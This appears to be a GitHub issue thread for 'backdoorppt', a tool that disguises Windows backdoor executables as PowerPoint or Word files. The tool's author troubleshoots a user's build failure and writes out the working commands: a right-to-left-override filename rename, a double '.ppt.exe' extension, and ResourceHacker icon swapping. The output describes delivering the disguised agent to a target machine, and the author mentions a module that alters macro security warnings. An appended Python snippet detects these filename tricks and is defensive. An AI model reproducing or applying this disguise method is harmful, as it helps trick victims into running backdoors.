error while compiling.. #6

Closed
Falesco opened this issue Mar 5, 2017 · 24 comments
@Falesco

Falesco commented Mar 5, 2017

```
[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
-e:1:in `rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resume‮tpp.exe) (Errno::ENOENT)
	from -e:1:in `<main>'
[⊶] Task over, Writing reports!
```

@r00t-3xp10it
Owner

r00t-3xp10it commented Mar 5, 2017

bug report: rename': No such file or directory


Do a check for me..

check if exist:

backdoorppt/output/backdoor.exe
or
backdoorppt/output/backdoor_ppt.exe

If the files are not present, then possible causes are:

1 - you did not enter the payload.exe binary to be transformed
    in the "PAYLOAD TO BE TRANSFORMED" zenity-box (full path location)
    and the backdoorppt tool cannot find the payload.exe to be transformed..
2 - 'PAYLOAD TO BE TRANSFORMED' is not a Windows binary payload.exe



If the files are present, then possible causes are:

1 - The 'Ruby interpreter' version is not compatible with the ruby command
      used by this tool "backdoorppt tool uses ruby 1.8.7 command syntax"

In that case: try using the 'BASH TRANSFORMATION' method instead

1º - edit the 'settings' file and change the following line:

BASH_TRANSFORMATION=NO
change it to:
BASH_TRANSFORMATION=YES

2º - save 'settings' file and run backdoorppt again

@Falesco
Author

Falesco commented Mar 5, 2017

Thanks for the reply, let me check:) brb

@Falesco
Author

Falesco commented Mar 5, 2017

backdoorppt/output/ is empty..

When I run the script, it lets me choose a .exe file via a dialog.
After that, I need to choose win7 settings for Wine.

Then it gives me this:

```
[⊶] Checking backend applications!
[☆] Ruby installation -> found!
[☆] Wine installation -> found!
[☆] Zenity installation-> found!
[☆] Xterm installation -> found!
[☆] Wine Program Files -> found!
[☆] Select [windows 7] from winecfg...

The ResourceHacker provided by backdoorppt tool
requires wine to be set to 'windows 7' version.

[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
-e:1:in `rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resume‮tpp.exe) (Errno::ENOENT)
	from -e:1:in `<main>'
[⊶] Task over, Writing reports!

Icon select : Microsoft-Word-2016.ico
Final file  : /root/Desktop/Tools/backdoorppt/output/resumeexe.ppt
Tool Author : r00t-3xp10it (SSA RedTeam)

Your backdoor agent its now transformed into one fake
word doc (ppt) remmenber that .exe extensions will not
be 'visible' under windows systems, because the system
default behavior its: NOT show hidden extensions...

We are now ready to start a handler (listener) and
deliver the transformed agent to the target machine.
```

@r00t-3xp10it
Owner

r00t-3xp10it commented Mar 5, 2017

Edit the 'settings' file and activate the BASH_TRANSFORMATION method..
BASH_TRANSFORMATION=YES

If it doesn't work, it means that your installed resourcehacker
is not doing its job of replacing payload icons ...

In that case, edit the 'settings' file and activate:
RESOURCEHACKER_BYPASS=YES

@Falesco
Author

Falesco commented Mar 5, 2017

It looks like everything goes perfect, but still nothing in OUTPUT:

```
root@kalix:~/Desktop/Tools/backdoorppt# ./backdoorppt.sh

+-+-+-+-+-+-+-+-+-+-+-+-+---+
|b|a|c|k|d|o|o|r|p|p|t|:|1.5|
+-+-+-+-+-+-+-+-+-+-+-+-+---+
'Office spoof extensions tool'
Credits: Damon Mohammadbagher

[⊶] Checking backend applications!
[☆] Wine installation -> found!
[☆] Zenity installation-> found!
[☆] Xterm installation -> found!
[☆] Wine Program Files -> found!
[☆] Select [windows 7] from winecfg...

The ResourceHacker provided by backdoorppt tool
requires wine to be set to 'windows 7' version.

[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
[⊶] Task over, Writing reports!

Icon select : Powerpoint-green.ico
Final file  : /root/Desktop/Tools/backdoorppt/output/testje.ppt.exe
Tool Author : r00t-3xp10it (SSA RedTeam)

Your backdoor agent its now transformed into one fake
word doc (ppt) remmenber that .exe extensions will not
be 'visible' under windows systems, because the system
default behavior its: NOT show hidden extensions...

We are now ready to start a handler (listener) and
deliver the transformed agent to the target machine.
```

@Falesco
Author

Falesco commented Mar 5, 2017

After a reboot, it seems to be working now!

@r00t-3xp10it
Owner

r00t-3xp10it commented Mar 5, 2017

Are the 2 transformation methods working now?
Which 'settings' are active in the backdoorppt/settings file?

@Falesco
Author

Falesco commented Mar 5, 2017

Bypassing ResourceHacker..

@Falesco
Author

Falesco commented Mar 5, 2017

I got the .ppt.exe now in OUTPUT

@Falesco
Author

Falesco commented Mar 5, 2017

So that did the trick right?

@r00t-3xp10it
Owner

r00t-3xp10it commented Mar 5, 2017

Not quite...
It means that your resourcehacker is not changing the payload icons...

Try to manually change the icons

Replace $UpL with the full path of your payload to be transformed

wine /root/.wine/drive_c/"Program Files/"Resource Hacker"/ResourceHacker.exe -open $UpL -save /root/Desktop/Tools/backdoorppt/output/backdoor.exe -action addskip -res /root/Desktop/Tools/backdoorppt/icons/Microsoft-Excel.ico -mask ICONGROUP,MAINICON,

NOTE: the settings file must be edited before running backdoorppt.sh, right?

@Falesco
Author

Falesco commented Mar 5, 2017

Yeah, of course.. But still nothing :)

@r00t-3xp10it
Owner

r00t-3xp10it commented Mar 5, 2017

Well, I have just tried the 4 different ways to build..
and everything works fine in my distro (kali rolling)...

It builds the 2 transformation methods (ruby or bash) using RH
and it builds the 2 transformation methods (ruby or bash) without using RH

@Falesco
Author

Falesco commented Mar 5, 2017

Yeah, no idea.. I'm running Kali 2. Also, I will try to reinstall the git, maybe that will do something..

@Falesco
Author

Falesco commented Mar 5, 2017

Any idea why I also don't get to choose the extension choice anymore? (doc, excl, etc)

@Falesco
Author

Falesco commented Mar 5, 2017

Btw.. is this the only "office spoof" tool you've got? Respect for this one, of course!
But I was reading about a silent doc exploit? Not even a macro, have you got any info about it?

@r00t-3xp10it
Owner

r00t-3xp10it commented Mar 5, 2017

Ahhh, you have some issue in your file system...
because backdoorppt.sh only uses the backdoorexe.ppt or backdoor.ppt.exe extension methods.

backdoorppt.sh uses the following commands to embed extensions (ruby method):
1 - mv ~/backdoorppt/output/backdoor.exe ~/backdoorppt/output/backdoor_ppt.exe > /dev/null 2>&1
2 - ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'

Those two commands will not interfere with the Linux file system in any way...

About the silent doc exploit: I have written a post-exploitation msf module
to change the macro sandbox warning dialog. Read it here: post-exploitation msf module

@Falesco
Author

Falesco commented Mar 5, 2017

okido let me check:) Thanks man

@Falesco
Author

Falesco commented Mar 5, 2017

```
root@kalix:~/Desktop/Tools/backdoorppt/output# ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'
-e:1:in `rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resume‮tpp.exe) (Errno::ENOENT)
	from -e:1:in `<main>'
```

@r00t-3xp10it
Owner

r00t-3xp10it commented Mar 5, 2017

The 2 commands above require a backdoor.exe
to be present in the backdoorppt/output folder to be able to 'transform' the extensions..

in RUBY it requires:

backdoorppt/output/backdoor_ppt.exe
and then
ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'

in BASH it requires:

/root/backdoorppt/output/backdoor.exe
and then
mv backdoorppt/output/backdoor.exe  backdoorppt/output/NAME.ppt.exe > /dev/null 2>&1
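
Added example, not part of the original thread or of the backdoorppt project: a defender-side check for the two file-name tricks named in the comments above, the U+202E right-to-left override (the bytes `\xe2\x80\xae` in the Ruby rename) and the `.ppt.exe` double extension. The function names and the extension lists are assumptions chosen for illustration.

```python
import unicodedata

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE; UTF-8 bytes e2 80 ae, as in the thread
# Bidirectional formatting characters that change how a name is displayed.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069\u200e\u200f")
# Assumed, non-exhaustive extension lists for illustration.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js"}
DOCUMENT_EXTS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt"}


def extension(name):
    """Text after the last dot, lower-cased ('' if there is no dot)."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def displayed_name(name):
    """Approximate the on-screen name: characters after U+202E render reversed."""
    head, sep, tail = name.partition(RLO)
    if not sep:
        return name
    tail = "".join(c for c in tail if c not in BIDI_CONTROLS)
    return head + tail[::-1]


def analyze_filename(name):
    """Return a list of findings for one file name (empty list = nothing flagged)."""
    findings = []
    for c in sorted(set(name) & BIDI_CONTROLS):
        findings.append("bidi-control:U+%04X %s" % (ord(c), unicodedata.name(c)))
    real, shown = extension(name), extension(displayed_name(name))
    if real in EXECUTABLE_EXTS and shown != real:
        findings.append("extension-mismatch:real=.%s shown=.%s" % (real, shown))
    parts = [p.lower() for p in name.split(".")]
    if len(parts) >= 3 and parts[-1] in EXECUTABLE_EXTS and parts[-2] in DOCUMENT_EXTS:
        findings.append("double-extension:.%s.%s" % (parts[-2], parts[-1]))
    return findings


if __name__ == "__main__":
    # The first two names appear in the thread; the last is a constructed benign control.
    samples = [
        b"resume\xe2\x80\xaetpp.exe".decode("utf-8"),
        "testje.ppt.exe",
        "quarterly-report.pptx",
    ]
    for s in samples:
        # repr() keeps the override visible as \u202e instead of reordering the terminal
        print(repr(s), "->", analyze_filename(s) or "clean")
```

The same check can run over attachment names at a mail gateway or over new-file events on an endpoint; logging names with `repr()` keeps the override character visible to the analyst.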

@Falesco
Author

Falesco commented Mar 5, 2017

Ohh okay, so choose the "backdoor" manually by placing it in the output folder

@r00t-3xp10it
Owner

yap

@Falesco
Author

Falesco commented Mar 5, 2017

okido:)

@r00t-3xp10it
Owner

Issue resolved .. resource hacker is working under wine 64 bits now ..
